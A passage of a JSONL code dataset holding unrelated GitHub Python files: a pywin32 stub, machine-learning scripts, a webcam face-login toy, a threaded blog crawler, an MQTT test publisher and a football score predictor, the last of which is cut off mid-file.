int\nMCI_ANIM_PLAY_SPEED: int\nMCI_ANIM_PLAY_REVERSE: int\nMCI_ANIM_PLAY_FAST: int\nMCI_ANIM_PLAY_SLOW: int\nMCI_ANIM_PLAY_SCAN: int\nMCI_ANIM_STEP_REVERSE: int\nMCI_ANIM_STEP_FRAMES: int\nMCI_ANIM_STATUS_SPEED: int\nMCI_ANIM_STATUS_FORWARD: int\nMCI_ANIM_STATUS_HWND: int\nMCI_ANIM_STATUS_HPAL: int\nMCI_ANIM_STATUS_STRETCH: int\nMCI_ANIM_INFO_TEXT: int\nMCI_ANIM_GETDEVCAPS_CAN_REVERSE: int\nMCI_ANIM_GETDEVCAPS_FAST_RATE: int\nMCI_ANIM_GETDEVCAPS_SLOW_RATE: int\nMCI_ANIM_GETDEVCAPS_NORMAL_RATE: int\nMCI_ANIM_GETDEVCAPS_PALETTES: int\nMCI_ANIM_GETDEVCAPS_CAN_STRETCH: int\nMCI_ANIM_GETDEVCAPS_MAX_WINDOWS: int\nMCI_ANIM_REALIZE_NORM: int\nMCI_ANIM_REALIZE_BKGD: int\nMCI_ANIM_WINDOW_HWND: int\nMCI_ANIM_WINDOW_STATE: int\nMCI_ANIM_WINDOW_TEXT: int\nMCI_ANIM_WINDOW_ENABLE_STRETCH: int\nMCI_ANIM_WINDOW_DISABLE_STRETCH: int\nMCI_ANIM_WINDOW_DEFAULT: int\nMCI_ANIM_RECT: int\nMCI_ANIM_PUT_SOURCE: int\nMCI_ANIM_PUT_DESTINATION: int\nMCI_ANIM_WHERE_SOURCE: int\nMCI_ANIM_WHERE_DESTINATION: int\nMCI_ANIM_UPDATE_HDC: int\nMCI_OVLY_OPEN_WS: int\nMCI_OVLY_OPEN_PARENT: int\nMCI_OVLY_STATUS_HWND: int\nMCI_OVLY_STATUS_STRETCH: int\nMCI_OVLY_INFO_TEXT: int\nMCI_OVLY_GETDEVCAPS_CAN_STRETCH: int\nMCI_OVLY_GETDEVCAPS_CAN_FREEZE: int\nMCI_OVLY_GETDEVCAPS_MAX_WINDOWS: int\nMCI_OVLY_WINDOW_HWND: int\nMCI_OVLY_WINDOW_STATE: int\nMCI_OVLY_WINDOW_TEXT: int\nMCI_OVLY_WINDOW_ENABLE_STRETCH: int\nMCI_OVLY_WINDOW_DISABLE_STRETCH: int\nMCI_OVLY_WINDOW_DEFAULT: int\nMCI_OVLY_RECT: int\nMCI_OVLY_PUT_SOURCE: int\nMCI_OVLY_PUT_DESTINATION: 
int\nMCI_OVLY_PUT_FRAME: int\nMCI_OVLY_PUT_VIDEO: int\nMCI_OVLY_WHERE_SOURCE: int\nMCI_OVLY_WHERE_DESTINATION: int\nMCI_OVLY_WHERE_FRAME: int\nMCI_OVLY_WHERE_VIDEO: int\nSELECTDIB: int\n\ndef DIBINDEX(n): ...\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/typeshed/stubs/pywin32/win32/lib/mmsystem.pyi","file_name":"mmsystem.pyi","file_ext":"pyi","file_size_in_byte":22380,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"4615436431","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nX_values = np.arange(1, 8)\n\ndata = [1, 2.5, 2.9, 6, 3.8, 4.1, 8.2]\n\nmodel1 = np.arange(1, 8)\nmodel2 = np.arange(0, 7, 1.1)\nmodel3 = np.arange(1.5, 9, 1.15)\n\nplt.plot(X_values, model1, c='green', label=f'MSE = {mean_squared_error(data, model1):.2f}') # the model\nplt.plot(X_values, model2, c='blue', label=f'MSE = {mean_squared_error(data, model2):.2f}') # the model\nplt.plot(X_values, model3, c='orange', label=f'MSE = {mean_squared_error(data, model3):.2f}') # the model\nplt.scatter(X_values, data, c='red') # the actual data\nplt.title(f'Mean Square Error (MSE) Example')\nplt.xlabel('X-Axis')\nplt.ylabel('Y-Axis')\nplt.legend()\n\n#plt.show()\nplt.savefig('Ball-Rague-Fig6.8.eps', bbox_inches='tight')\n\n","repo_name":"robertball/Beginners-Guide-Data-Science","sub_path":"Chapter_6_Metrics/mse.py","file_name":"mse.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"33066869721","text":"from xgboost import XGBRegressor\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nclass XGBoostAdapted(BaseEstimator):\n\n def __init__(self, early_stopping_rounds=10, eval_metric=None, eval_set_percent=0.2, random_seed=None, n_jobs=1, max_depth=6, n_estimators=50, nthread=1, reg_alpha=0):\n self.early_stopping_rounds = early_stopping_rounds\n self.eval_metric = eval_metric\n self.eval_set_percent = eval_set_percent\n self.random_seed = random_seed\n self.n_jobs = n_jobs\n self.max_depth = max_depth\n self.n_estimators = n_estimators\n self.nthread = nthread\n self.reg_alpha = reg_alpha\n\n \n def fit(self, X, y):\n self._xgbregressor = XGBRegressor(n_jobs=self.n_jobs, max_depth=self.max_depth, n_estimators=self.n_estimators, nthread=self.nthread, reg_alpha=self.reg_alpha)\n\n X_train, X_test, y_train, y_test = train_test_split(X.values, y.values, test_size=self.eval_set_percent, random_state=self.random_seed)\n\n eval_set = [(X_test, y_test)]\n\n self._xgbregressor.fit(X_train, y_train, early_stopping_rounds=self.early_stopping_rounds, eval_metric=self.eval_metric, eval_set=eval_set)\n \n return self\n\n def score(self, X, y, sample_weight=None):\n return self._xgbregressor.score(X.values, y.values, sample_weight)\n\n def predict(self, X):\n return self._xgbregressor.predict(X.values)\n\n\n\n\n \n \n\n\n\n\n\n","repo_name":"juaml/brainage_estimation","sub_path":"brainage/xgboost_adapted.py","file_name":"xgboost_adapted.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"10982747203","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import layers\nfrom keras.layers import TextVectorization\nfrom 
sklearn.model_selection import train_test_split\n\ndf = pd.read_excel(\"generated_data.xlsx\")\ndf = df.drop(columns=['LENGTH', 'TYPE'])\n\nfeatures, targets = df['TITLE'], df['LABEL']\n\ntrain_features, test_features, train_targets, test_targets = train_test_split(\n features, targets,\n train_size=0.8,\n test_size=0.1,\n random_state=42,\n shuffle=True,\n stratify=targets\n)\n\ntrain_features, val_features, train_targets, val_targets = train_test_split(\n train_features, train_targets,\n train_size=0.8,\n test_size=0.1,\n random_state=42,\n shuffle=True,\n stratify=train_targets\n)\n\n# train X & Y\ntrain_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(train_features.values, tf.string)\n)\ntrain_cat_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(train_targets.values, tf.int64),\n\n)\n# test X & y\ntest_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(test_features.values, tf.string)\n)\ntest_cat_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(test_targets.values, tf.int64),\n)\n\n# val X & Y\nval_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(val_features.values, tf.string)\n)\nval_cat_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(val_targets.values, tf.int64),\n)\n\n# Model constants.\nmax_features = 20000\nembedding_dim = 128\nsequence_length = 90\n\n# Now that we have our custom standardization, we can instantiate our text\n# vectorization layer. We are using this layer to normalize, split, and map\n# strings to integers, so we set our 'output_mode' to 'int'.\n# Note that we're using the default split function,\n# and the custom standardization defined above.\n# We also set an explicit maximum sequence length, since the CNNs later in our\n# model won't support ragged sequences.\nvectorize_layer = TextVectorization(\n max_tokens=max_features,\n output_mode=\"int\",\n output_sequence_length=sequence_length,\n)\n\nvectorize_layer.adapt(train_features)\nvocab = vectorize_layer.get_vocabulary()\n\ndef convert_text_input(sample):\n text = sample\n text = tf.expand_dims(text, -1)\n return tf.squeeze(vectorize_layer(text))\n\n# Train X\ntrain_text_ds = train_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n# Test X\ntest_text_ds = test_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n# Val X\nval_text_ds = val_text_ds_raw.map(convert_text_input,\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\ntrain_ds = tf.data.Dataset.zip(\n (\n train_text_ds,\n train_cat_ds_raw\n )\n)\n\ntest_ds = tf.data.Dataset.zip(\n (\n test_text_ds,\n test_cat_ds_raw\n )\n)\n\nval_ds = tf.data.Dataset.zip(\n (\n val_text_ds,\n val_cat_ds_raw\n )\n)\n\n\nbatch_size = 64\nAUTOTUNE = tf.data.experimental.AUTOTUNE\nbuffer_size= train_ds.cardinality().numpy()\n\ntrain_ds = train_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\ntest_ds = test_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\nval_ds = val_ds.shuffle(buffer_size=buffer_size)\\\n .batch(batch_size=batch_size,drop_remainder=True)\\\n .cache()\n\n\n#\n# ############## MODEL ##################\ninputs_tokens = layers.Input(shape=(sequence_length,), dtype=tf.int32)\nembedding_layer = layers.Embedding(max_features, 256)\nx = embedding_layer(inputs_tokens)\nx = layers.Flatten()(x)\noutputs = layers.Dense(3, activation=\"softmax\")(x)\nmodel = keras.Model(inputs=inputs_tokens, outputs=outputs)\n\nloss_fn = 
tf.keras.losses.SparseCategoricalCrossentropy()  # labels are integer class ids and the model already ends in softmax, so use the sparse loss on probabilities\nmetric_fn = tf.keras.metrics.SparseCategoricalAccuracy()\nmodel.compile(loss=loss_fn, optimizer=\"adam\", metrics=[metric_fn])\nepochs = 3\n\n# Fit the model using the train and validation datasets.\nmodel.fit(train_ds, validation_data=val_ds, epochs=epochs, verbose=1)\n\nmodel.evaluate(test_ds)\n\n#model.save(\"fitted_model\")\n\n\n\n\n\n\n\n\n\n\n\n# loaded_model = keras.models.load_model(\"fitted_model\")\n#\n# loaded_model.evaluate(test_ds)\n#\n# end_to_end_model = keras.Sequential([\n# keras.Input(shape=(1,), dtype=\"string\"),\n# vectorize_layer,\n# loaded_model,\n# keras.layers.Activation('softmax')\n# ])\n#\n# end_to_end_model.compile(\n# loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False), optimizer=\"adam\", metrics=['accuracy']\n# )\n#\n# while True:\n# raw_data = \"Meeting with Matan\"\n# predictions=end_to_end_model.predict([raw_data])\n# print(np.argmax(predictions[0]))\n# raw_data = input(\"Input assignment\")","repo_name":"matanEpel/ai-project---calender","sub_path":"leaner_turkish.py","file_name":"leaner_turkish.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20159835464","text":"#!/usr/bin/env python\n\n\"\"\"GeoKey setup.\"\"\"\n\nfrom os.path import join\nfrom setuptools import setup, find_packages\n\nfrom geokey.version import get_version\n\n\nname = 'geokey'\nversion = get_version()\nrepository = join('https://github.com/ExCiteS', name)\n\n\ndef get_install_requires():\n    \"\"\"\n    Get requirements (ignore links, exclude comments).\n\n    Returns\n    -------\n    list\n        Requirements for GeoKey.\n    \"\"\"\n    requirements = list()\n    for line in open('requirements.txt').readlines():\n        if line.startswith('#') or line.startswith('git+https') or line == '':\n            continue\n        requirements.append(line.rstrip())\n    return requirements\n\n\nsetup(\n    name=name,\n    version=version,\n    description='Platform for participatory mapping',\n    url='http://geokey.org.uk',\n    download_url=join(repository, 'tarball', version),\n    author='ExCiteS',\n    author_email='excites@ucl.ac.uk',\n    license='Apache 2.0',\n    packages=find_packages(),\n    include_package_data=True,\n    install_requires=get_install_requires(),\n)\n","repo_name":"ExCiteS/geokey","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"66"} +{"seq_id":"21383021434","text":"import csv\n\nstats = 0;\nzeroes = 0;\nlist = []\nwith open('../Data/class.csv', 'r') as inputs:\n    r = csv.reader(inputs, delimiter=',')\n    for row in r:\n        l = [str(row[0]), str(row[1]), str(row[12])]\n        if (row[12] == 'lcom*' or row[12] == 'NaN'):\n            pass\n        else :\n            stats += float(row[12])\n            if float(row[12]) == 0:\n                zeroes = zeroes + 1\n            list.append(l)\n\nprint(stats / len(list))\nprint(zeroes)\nprint(len(list))\n\nwith open('../Data/ckjm_lcom.csv', 'w') as outputs:\n    w = csv.writer(outputs)\n    for i in range(len(list)):\n        w.writerow(list[i])\n\n","repo_name":"xavlap/IFT3913TP2","sub_path":"src/filter_ckjm_LCOM.py","file_name":"filter_ckjm_LCOM.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12558922974","text":"import paho.mqtt.client as mqtt\nfrom time import sleep\nfrom random import randint\nmqttc = mqtt.Client()\nmqttc.connect(\"192.168.1.45\", 1883)\nwhile(1):\n    for i in 
range(200,-1,-1):\n        mqttc.publish(\"nickWmV\", i)\n        print(str(i))\n        sleep(1)\n    break\n\nprint(\"END OF PROGRAM\")\n\nmqttc.loop(2)","repo_name":"NicholasWM-zz/Cursos","sub_path":"Python/AULAS/Alura/Python3/Python_1_e_2/IoT/publish-test.py","file_name":"publish-test.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18150782135","text":"import cv2\nimport glob, os\nimport numpy as np\nfrom PIL import Image\nfrom pkg_resources import resource_stream\nimport skimage.color\n\nimport matplotlib.pyplot as plt\n\ndir = \"./dataset/\"\nos.chdir(dir)\nnp.set_printoptions(suppress=True)\nvideos = [\"picklist_17\",\"picklist_18\",\"picklist_19\",\"picklist_20\",\"picklist_21\",\"picklist_22\"]\nfor video in videos:\n    files = sorted(glob.glob(video + '/*.jpg'), key=os.path.getmtime)\n    with open(\"../\" + video, 'w') as fi:\n        for file in files:\n            print(file)\n            # if \"blue1\" in file:\n            pil_image = Image.open(resource_stream(__name__, dir+file))\n            color_image = np.array(Image.open(resource_stream(__name__, dir+file)))\n            # color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\n            number_of_pixels = color_image.shape[0] * color_image.shape[1]\n            hsv_image = skimage.color.rgb2hsv(color_image)\n            dims = hsv_image.shape\n            hues = []\n            saturations = []\n            for i in range(0, dims[0]):\n                for j in range(0, dims[1]):\n                    # subsample\n                    if i % 1 == 0:\n                        # BGR\n                        hsv_value = np.array([[hsv_image[i, j, 0],\n                                               hsv_image[i, j, 1],\n                                               hsv_image[i, j, 2]]])\n                        # rgb_value = np.array([[color_image[i, j, 0],\n                        #                        color_image[i, j, 1],\n                        #                        color_image[i, j, 2]]]) / 255.0\n                        hues.append(hsv_value[0][0])\n                        saturations.append(hsv_value[0][1])\n            f, axarr = plt.subplots(2, 2)\n\n            axarr[0,0].imshow(color_image)\n            h = sum(hues)/len(hues)\n            s = sum(saturations)/len(saturations)\n            # print(max(set(hues), key=hues.count)) #mode\n            # print(max(set(saturations), key=saturations.count)) #mode\n            V = np.array([[h, s]])\n            origin = np.array([[0, 0, 0], [0, 0, 0]])  # origin point\n            # axarr[1].set_xlim([0, 10])\n            # axarr[1].set_ylim([0, 10])\n            axarr[0,1].quiver(*origin, V[:, 0], V[:, 1], color=['r'], scale=10)\n            circle1 = plt.Circle((0, 0), 1 / 21, fill=False)\n            axarr[0,1].add_patch(circle1)\n            hist_n,hist_bins, _ = axarr[1,0].hist(hues, bins=10, range=(0,1))\n            axarr[1,0].set_xlim([0, 1])\n            # axarr[1,0].set_title(\"Hue\")\n            sat_n,sat_bins, _ = axarr[1,1].hist(saturations, bins=10, range=(0,1))\n            # print(hist_n, hist_bins)\n            # print(sat_n, sat_bins)\n\n            histsat = np.concatenate((hist_n, sat_n))\n            mystring = str(histsat).replace(\"[\",\"\").replace(\"]\",\"\").replace(\".\",\"\").replace(\"\\n\",\"\")\n            newstring = ' '.join(mystring.split())\n            print(newstring)\n            fi.write(newstring)\n            fi.write(\"\\n\")\n\n            axarr[1,1].set_xlim([0, 1])\n            # axarr[1,1].set_title(\"Saturation\")\n            # plt.show()\n            # plt.close()\n\n\n\n","repo_name":"czming/ai-through-symbiosis","sub_path":"frame_to_hsv.py","file_name":"frame_to_hsv.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"18219097298","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 11 15:28:32 2018\n\n@author: ecupl\n\"\"\"\n\n# use color histograms to decide whether two face images show the same person\nfrom PIL import Image\nfrom functools import reduce\nimport math, operator, cv2, os\n\nos.chdir(\"D:\\\\mywork\\\\test\")\n# create the face detector\nfaceCascade = 
cv2.CascadeClassifier(\"D:\\\\python\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\")\nloginface = 'face\\\\login.jpg'\nrecogface = 'face\\\\recog.jpg'\n\n# define the function that captures a face image\ndef makeface(filename):\n    print('Press any key to open the capture window\nOnce the camera is on, press Z to take the photo')\n    cv2.namedWindow('face')\n    cv2.waitKey(0)\n    cap = cv2.VideoCapture(0)       # open the camera\n    while(cap.isOpened()):\n        ret, img = cap.read()       # read a frame\n        cv2.waitKey(30)\n        # detect faces and draw bounding boxes\n        peopleface = faceCascade.detectMultiScale(img,scaleFactor=1.2,minNeighbors=3,minSize=(10,10),flags=cv2.CASCADE_SCALE_IMAGE)\n        for x,y,w,h in peopleface:\n            cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),1)\n        if ret==True:\n            cv2.imshow('face',img)\n            k=cv2.waitKey(30)\n            if k==ord('z') or k==ord('Z'):      # check whether Z was pressed\n                cv2.imwrite(filename,img)\n                break\n    cv2.waitKey(500)\n    face = Image.open(filename)\n    face1 = face.crop((x,y,x+w,y+h))\n    face2 = face1.resize((200,200),Image.ANTIALIAS)\n    face2.save(filename)\n    cap.release()\n    cv2.destroyAllWindows()\n\n\nif os.path.exists('face\\\\recog.jpg'):\n    makeface(loginface)\n    pic1 = Image.open('face\\\\recog.jpg')\n    pic2 = Image.open('face\\\\login.jpg')\n    h1=pic1.histogram()     # 16 bins, 3 channels\n    h2=pic2.histogram()\n    diff = math.sqrt(reduce(operator.add, list(map(lambda a,b:(a-b)**2,h1,h2)))/len(h1))\n    if diff<=100:\n        print(\"Verification passed. diff=%.2f\"%diff)\n    else:\n        print(\"Face mismatch, login denied. diff=%.2f\"%diff)\nelse:\n    makeface(recogface)\n    print('Reference face image captured successfully.')\n#import matplotlib.pyplot as plt\n#plt.hist(h2,bins=50) \n# an alternative way to compute diff\n#diff2 = (sum(list(map(lambda a,b:(a-b)**2,h1,h2)))/len(h1))**0.5\n\n\n\n","repo_name":"shoucangjia1qu/study_python","sub_path":"face_login(study0811).py","file_name":"face_login(study0811).py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19133304634","text":"import queue\nimport random\nimport threading\nimport time\nimport requests\nfrom resources import urls\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\"\"\"\nYou can use: time curl http://ip:port/xxx to test the response time\n\"\"\"\n\n\n\ndef craw(url):\n    \"\"\"Send a request to the given url and return the page content\"\"\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\"\n    }\n    r = requests.get(url, headers=headers)\n    # print(url, len(r.text))\n    return r.text\n\n\ndef parse(html):\n    \"\"\"Parse the page content\"\"\"\n    soup = BeautifulSoup(html, \"html.parser\")\n    links = soup.find_all(\"a\", class_=\"post-item-title\")\n    return [(link[\"href\"], link.get_text()) for link in links]\n\n\nclass base_multi_thread:\n\n    def multi_thread(self, num=-1):\n        threads = []\n        for url in self.urls[:num]:\n            threads.append(\n                threading.Thread(target=craw, args=(url,))\n            )\n\n        for thread in threads:\n            thread.start()\n\n        for thread in threads:\n            thread.join()\n\n\nclass ProducerConsumer:\n    def __init__(self, url_queue, html_queue):\n        self.url_queue = url_queue\n        self.html_queue = html_queue\n\n    def do_craw(self):\n        count = 0\n        while True:\n            url = self.url_queue.get()\n            if not url and count < 3:\n                count += 1\n                continue\n            if count >= 3:\n                break\n            html = craw(url)\n            self.html_queue.put(html)\n            time.sleep(random.randint(1, 2))\n\n    def do_parse(self, fout):\n        count = 0\n        while True:\n            html = self.html_queue.get()\n            if not html and count < 3:\n                count += 1\n                continue\n            if count >= 3:\n                break\n            results = parse(html)\n            for result in results:\n                fout.write(str(result) + \"\\n\")\n            time.sleep(random.randint(1, 2))\n\n    def 
run(self):\n        for url in urls:\n            self.url_queue.put(url)\n        print(self.url_queue.qsize())\n\n        for idx in range(3):\n            t = threading.Thread(target=self.do_craw, name=f\"craw{idx}\")\n            t.start()\n\n        fout = open(\"result.txt\", \"w\")\n        for idx in range(2):\n            t = threading.Thread(target=self.do_parse, args=(fout,), name=f\"parse{idx}\")\n            t.start()\n\n\nclass ThreadPoolObj:\n\n    def __init__(self):\n        pass\n\n    def method1(self):\n        \"\"\"Prints the results in submission order\"\"\"\n        with ThreadPoolExecutor() as pool:\n            results = pool.map(craw, urls)\n            for result in results:\n                print(result)\n\n    def method2(self):\n        \"\"\"Prints each thread's result as soon as that thread finishes\"\"\"\n        with ThreadPoolExecutor() as pool:\n            futures = [pool.submit(craw, url) for url in urls]\n            for future in futures:\n                print(future.result())\n            for future in as_completed(futures):\n                print(future.result())\n\n\nif __name__ == '__main__':\n    url_queue = queue.Queue()\n    html_queue = queue.Queue()\n    PC = ProducerConsumer(url_queue, html_queue)\n    PC.run()\n","repo_name":"moye233057/moye_notebook","sub_path":"MultiProcess/实战/多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34626798031","text":"import csv\nfrom collections import defaultdict\nfrom random import uniform\nimport scipy.optimize as sc\nfrom math import exp, factorial\n\nvariables = {}\nind_variables = {}\nteams = set()\nfilename = 'premierleague_scores.csv'\nwith open(filename, newline='') as csvfile:\n    _reader = csv.reader(csvfile, delimiter=';')\n    next(_reader)\n    for row in _reader:\n        teams.add(row[0])\n\nfor team in teams:\n    variables[(team, 'A')] = [0, 0]\n    variables[(team, 'D')] = [0, 0]\n\ndef find_prob(team_a, team_d, k):\n    return (pow(variables[(team_a, 'A')], k)*exp(-variables[(team_a, 'A')])+\n            pow(variables[(team_d, 'D')], k)*exp(-variables[(team_d, 'D')]))/(2*factorial(k))\n    # sm = 0\n    # for i in range(2*k+1):\n    #     sm += pow(variables[(team_a, 'A')], i)*exp(-variables[(team_a, 'A')])*\\\n    #           pow(variables[(team_d, 'D')], 2*k-i)*exp(-variables[(team_d, 'D')])\\\n    #           /(factorial(i)*factorial(2*k-i))\n    # return sm\n\nwith open(filename, newline='') as csvfile:\n    _reader = csv.reader(csvfile, delimiter=';')\n    next(_reader)\n    for row in _reader:\n        variables[(row[0], 'A')][0] += int(row[2])\n        variables[(row[0], 'A')][1] += 1\n        variables[(row[1], 'D')][0] += int(row[2])\n        variables[(row[1], 'D')][1] += 1\n        variables[(row[1], 'A')][0] += int(row[3])\n        variables[(row[1], 'A')][1] += 1\n        variables[(row[0], 'D')][0] += int(row[3])\n        variables[(row[0], 'D')][1] += 1\n\nfor v in variables:\n    print(v, variables[v], variables[v][0]/variables[v][1])\n    variables[v] = variables[v][0]/variables[v][1]\n\n\n# matches = [('Leicester City', 'Everton', '2-1'),\n# ('Manchester United', 'Aston Villa', '2-2'),\n# ('Norwich City', 'Arsenal Londyn', '2-2'),\n# ('Wolverhampton', 'Sheffield United', '1-1'),\n# ('Southampton FC', 'Watford FC', '2-1'),\n# ('Burnley FC', 'Crystal Palace', '0-2'),\n# ('Chelsea Londyn', 'West Ham United', '0-1'),\n# ('Liverpool FC', 'Brighton & Hove', '2-1'),\n# ('Tottenham Hotspur', 'AFC Bournemouth', '3-2'),\n# ('Newcastle United', 'Manchester City', '2-2')]\nprint(teams)\n# matches = [('PSG', 'Lyon', '0-1'),\n# ('Lille', 'Bordeaux', '2-1'),\n# ('Brest', 'Reims', '2-1'),\n# ('Lorient', 'Nimes', '3-0'),\n# ('Nantes', 'Dijon', '1-1'),\n# ('Strasbourg', 'Metz', '2-2'),\n# ('Nice', 'Rennes', '0-1'),\n# ('Lens', 'Montpellier', '2-3'),\n# ('Marsylia', 'Monaco', '2-1'),\n# ('St. 
Etienne', 'Angers', '0-0')]\n\n# matches = [('Lechia', 'Wisła Płock', '0-1'),\n# ('Raków', 'Jagiellonia', '3-2'),\n# ('Stal', 'Lech', '1-1'),\n# ('Wisła Kraków', 'Legia', '1-2'),\n# ('Górnik', 'Cracovia', '0-2'),\n# ('Warta', 'Pogoń', '1-2'),\n# ('Zagłębie', 'Śląsk', '2-1'),\n# ('Podbeskidzie', 'Piast', '0-5')]\n\n# matches = [('Schalke', 'Freiburg', '0-2'),\n# ('Bremen', 'Dortmund', '1-2'),\n# ('Hertha', 'Mainz', '0-0'),\n# ('Stuttgart', 'Union Berlin', '2-2'),\n# ('Frankfurt', 'Moenchengladbach', '3-3'),\n# ('Bayern', 'Wolfsburg'), ('Bielefeld', 'Augsburg'), ('FC Koeln', 'Leverkusen'), ('Hoffenheim', 'RB Lipsk')]\n\n# matches = [('RB Salzburg', 'LASK Linz', '3-1'),\n# ('SK Rapid Wiedeń', 'Swarovski Tirol', '0-3'),\n# ('Wolfsberger AC', 'FK Austria Wiedeń', '3-2'),\n# ('SV Ried', 'SC Rheindorf Altach', '1-4'),\n# ('SKN Sankt Pölten', 'Hartberg', '2-2'),\n# ('SK Sturm Graz', 'Admira', '3-0')]\n#\n# matches = [('Celtic Glasgow FC', 'Kilmarnock FC', '2-0'),\n# ('Dundee United FC', 'Glasgow Rangers FC', '1-2'),\n# ('Saint Johnstone FC', 'Livingston FC', '1-2'),\n# ('Motherwell FC', 'Saint Mirren FC', '0-1'),\n# ('Hamilton Academicals FC',\t'Hibernian FC', '0-4'),\n# ('Aberdeen FC', 'Ross County', '2-0')]\n\n\nmatches = []\nwith open('premierleague_scores.csv', newline='') as csvfile:\n _reader = csv.reader(csvfile, delimiter=';')\n next(_reader)\n for row in _reader:\n matches.append([(row[0], row[1], int(row[2]), int(row[3]))])\n\ncounts_102 = [0, 0, 0]\ncounts_numgoals = [0,0,0,0,0]\ncounts_intervals = [0,0,0,0]\ncounts_singles = [0,0,0,0]\ncounts_exacts = [0,0,0,0,0,0,0,0]\n\ncounts_12 = [0,0,0,0]\nfor m in matches:\n scores = []\n scores_numgoals = defaultdict(float)\n scores_102 = defaultdict(float)\n scores_intervals = defaultdict(float)\n scores_teams = defaultdict(int)\n scores_1 = defaultdict(float)\n scores_2 = defaultdict(float)\n scores_12 = defaultdict(float)\n for i in range(15):\n for j in range(15):\n p = find_prob(m[0][0], m[0][1], i)*find_prob(m[0][1], m[0][0], j)\n if i != j:\n scores_12[12] += p\n else:\n scores_12[0] += p\n t = 0.745\n if scores_12[12] >= t and m[0][2] != m[0][3]:\n counts_12[0] += 1\n elif scores_12[12] < t and m[0][2] != m[0][3]:\n counts_12[1] += 1\n elif scores_12[12] < t and m[0][2] == m[0][3]:\n counts_12[2] += 1\n else:\n counts_12[3] += 1\n # scores.append(((i, j), p))\n # scores_numgoals[(i+j)] += p\n # if i+j == 0: scores_intervals['0'] += p\n # elif i+j == 1: scores_intervals['1'] += p\n # elif i+j == 2: scores_intervals['2'] += p\n # else: scores_intervals['3+'] += p\n # if i > j: scores_102[1] += p\n # elif i == j: scores_102[0] += p\n # else: scores_102[2] += p\n # if i == 0: scores_1['0'] += p\n # elif i == 1: scores_1['1'] += p\n # elif i == 2: scores_1['2'] += p\n # else: scores_1['3+'] += p\n # if j == 0: scores_2['0'] += p\n # elif j == 1: scores_2['1'] += p\n # elif j == 2: scores_2['2'] += p\n # else: scores_2['3+'] += p\n # _scores_102 = [scores_102[1], scores_102[0], scores_102[2]]\n # _scores_102.sort(reverse=True)\n # _scores_numgoals = [scores_numgoals[0], scores_numgoals[1], scores_numgoals[2],\n # scores_numgoals[3], scores_numgoals[4], scores_numgoals[5],\n # scores_numgoals[6], scores_numgoals[7]]\n # _scores_numgoals.sort(reverse=True)\n # _scores_intervals = [scores_intervals['0'], scores_intervals['1'], scores_intervals['2'], scores_intervals['3+']]\n # _scores_intervals.sort(reverse=True)\n # _scores_1 = [scores_1['0'], scores_1['1'], scores_1['2'], scores_1['3+']]\n # _scores_2 = [scores_2['0'], scores_2['1'], 
